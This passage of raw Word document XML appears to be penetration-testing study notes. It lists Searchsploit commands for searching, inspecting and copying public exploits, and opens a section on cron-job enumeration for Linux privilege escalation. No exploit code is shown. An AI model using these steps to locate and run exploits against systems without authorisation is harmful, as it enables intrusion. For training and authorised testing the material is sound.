      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sq6n2lifrnhs" w:id="370"/>
      <w:bookmarkEnd w:id="370"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A6B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rpjjy5ypewzo" w:id="371"/>
      <w:bookmarkEnd w:id="371"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Searchsploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A6C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A6D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A6E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, update the local copy:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A6F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt update &amp;&amp; sudo apt install exploitdb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="328"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The above command updates the local copy of the Exploit Database archive under /usr/share/exploitdb/. This directory is split into two major sections, exploits and shellcodes. The /usr/share/exploitdb/ directory contains CSV files for each of the exploits and shellcodes directories. Each CSV file contains the file information of all files within their respective subdirectories. These CSV files contain similar information to the Exploit DB website, such as the EDB-ID, title, author, platform, and other information we covered previously.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A71">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1435100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="459" name="image443.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image443.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId880"/>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2A72">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A73">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="812800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="512" name="image488.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image488.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId881"/>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2A74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1127"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit id's are those numbers inside of the "Path"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A75">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A76">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Update Searchsploit Database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="640"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit -u</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A78">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A79">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to use:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1179"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit [service and version]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A7B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A7C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to look into a specific one script (Show Detailed Exploit Information):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1353"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit -x [exploit id]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A7E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1353"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tells you requirements and more info about scrip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1353"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PRESS "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">q</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to get out of the view</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A80">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A81">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy an Exploit to Your (current working) Directory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="718"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit -m [exploit id]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A83">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="718"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you can specify the path to the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="718"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4814888" cy="3186777"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="120" name="image117.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image117.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId882"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4814888" cy="3186777"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A85">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A86">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclude Certain Terms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1321"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit apache --exclude php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A88">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A89">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Export Results to a File:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A8A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit Apache &gt; apache_exploits.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A8B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A8C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Exact Keyword</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1091"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit "Apache 2.4.29"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A8E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A8F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get Structured JSON Output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="274"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit --json [keyword]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A91">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A92">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open in the web:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="580"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit -w [keyword]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A94">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A95">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Once you find a CVE, start searching with that exact CVE since it will give you more exact results</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A9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97">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d6h2l1g7q2m6" w:id="372"/>
      <w:bookmarkEnd w:id="372"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scheduled Tasks (Cron) Enumeration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A98">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9q3y40n9ph3v" w:id="373"/>
      <w:bookmarkEnd w:id="373"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Checking installed cron jobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A99">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A9A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (18.1.2. Manual Enumeration) (Module 18 Linux Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A9B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A9C">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, let's examine scheduled tasks that attackers commonly leverage during privilege escalation attacks. Systems acting as servers often periodically execute various automated, scheduled tasks. When these systems are misconfigured, or the user-created files are left with insecure permissions, we can modify these files that will be executed by the scheduling system at a high privilege level.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A9D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Linux-based job scheduler is known as</w:t>
      </w:r>
      <w:hyperlink r:id="rId883">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
